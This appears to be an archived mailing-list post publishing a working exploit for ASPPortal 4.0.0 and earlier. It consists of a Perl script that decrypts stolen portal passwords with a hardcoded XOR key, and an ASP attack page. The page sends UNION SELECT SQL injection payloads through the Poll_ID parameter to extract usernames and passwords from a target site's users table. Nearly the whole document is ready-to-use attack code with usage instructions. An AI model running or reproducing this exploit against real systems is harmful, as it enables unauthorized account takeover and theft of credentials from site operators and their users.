<<< Date Index >>>     <<< Thread Index >>>

ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit



Perl Script Decode:

#!/usr/bin/perl
#AspPortal Password Decrypter
#Get pass exploit.asp and this copy this window
#Speical Thanks To::: Nukedx ,For ASPPORTAL Decrypter
#ajann
if(@1 = 1) { exploit(); }

sub decrypt ()
{
  $lp = length($appass);
  $apkey = 
"IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V";
  if ($lp == 0) { die("- An error occurued\r\n"); }
  for ($i = 0; $i < $lp ; $i++) {
    $f = $lp - $i - 1; # Formula for getting character via substr...
    $n = substr($apkey,$f,1);
    $l = substr($appass,$f,1);
    $appwd = chr(ord($n)^ord($l)).$appwd;
  }
  print "- Password decrypted as: $appwd\r\n";
  exit();
}
sub exploit () 
{
      print "Password?: ";
      $kroo = <STDIN>;
      chop ($kroo);
      $appass = $kroo;
      $appass =~ s/(&quot;)/chr(34)/eg;
      $appass =~ s/(&lt;)/chr(60)/eg;
      $appass =~ s/(&gt;)/chr(62)/eg;
      $appass =~ s/(&nbsp;)/chr(32)/eg;
      decrypt();
    exit(); 
}



Exploit:


<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>

<%

'===============================================================================================
'[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
'[Coded by   : ajann
'[Author   : ajann
'[Contact    : :(
'[ExploitName: exploit1.asp

'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'[Using : Tr:Alýnan Sifreyi Perl scriptinde cözün.
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel 
cekebilirsiniz
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu düsünmüyorum.
'===============================================================================================
'use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke

%>

<html>
<title>ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit</title>
<head>

<script language="JavaScript">    
  function functionControl1(){  
        setTimeout("functionControl2()",2000);    
     }  
  
  function functionControl2(){  
            if(document.form1.field1.value==""){  
 
     alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
        
                             }  
                        }

  function writetext() {

            if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" 
size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take 
</font>'

                            }
                 }
  function write(){  
        setTimeout("writetext()",1000);    
     }  
  
</script>


</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">

<center>
<font face="Verdana" size="2" color="#008000"><b><a 
href="exploit1.asp">ASPPortal &lt;=</b>v4.0.0(default1.asp) <u><b>
Remote SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: 
collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" 
bordercolordark="#008000" bordercolor="#808080">
  <tr>
    <td width="50%" bgcolor="#808000" 
onmouseover="javascript:this.style.background='#808080';" 
onmouseout="javascript:this.style.background='#808000';">
    <font face="Arial" size="1"><b><font 
color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
    <b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font 
face="Arial" size="1"><b>Example:[User 
    ID=1]</b></font></td>
    <td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://"; size="25" 
style="background-color: #808080"><br><input type="text" name="id" value="1" 
size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
  </tr>

</table>

<div id=htmlAlani></div>

<%
islem = Request.QueryString("islem")    
If islem = "hata1" Then 
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a 
problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then 
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a 
problem! Please right character use</font>"
End If
If islem = "hata3" Then 
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a 
problem! Add ""http://"";</font>"
End If
%>

<%  

If islem = "get" Then

string1="default1.asp"
string2="default1.asp"
cek= Request.Form("id")


targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://"; ,1)

If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")

Else
If arama>0 then 
Response.Redirect("exploit1.asp?islem=hata2")

Else
If arama2=0 then 
Response.Redirect("exploit1.asp?islem=hata3")

Else
%> 

<%

target1 = targettext+string1
target2 = targettext+string2

Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
  .Open "POST" , come, FALSE
  .setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
  .send 
"Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take =  .Responsetext
End With
SET objtake = Nothing
End Function

Public Function take1(come1)
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake1
  .Open "POST" , come1, FALSE
  .setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
  .send 
"Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek
take1 =  .Responsetext
End With
SET objtake1 = Nothing
End Function

get_username = take(target1)
get_password = take1(target2)

getdata=InStr(get_username,"Poll Question:</b>&nbsp;" )
username=Mid(get_username,getdata+24,14)
passwd=Mid(get_password,getdata+24,14)

%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: 
collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" 
bordercolordark="#008000" bordercolor="#808080">
  <tr>
    <td width="50%" bgcolor="#808000" 
onmouseover="javascript:this.style.background='#808080';" 
onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    <b><font size="2" face="Arial">User Name:</font></b></td>
    <td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" 
face="Verdana"><%=username%></font></b></td>
  </tr>
  <tr>
    <td width="50%" bgcolor="#808000" 
onmouseover="javascript:this.style.background='#808080';" 
onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    <b><font size="2" face="Arial">&nbsp;User Password:</font></b></td>
    <td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" 
face="Verdana"><%=passwd%></font></b></td>
  </tr>

</table>

<form method="POST" name="form2" action="#">    
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>      
</form> 

</center>

<script language="JavaScript">
write()
functionControl1()
</script>

</body>
</html>

<%
End If
End If
End If
End If
Set objtake = Nothing 
%>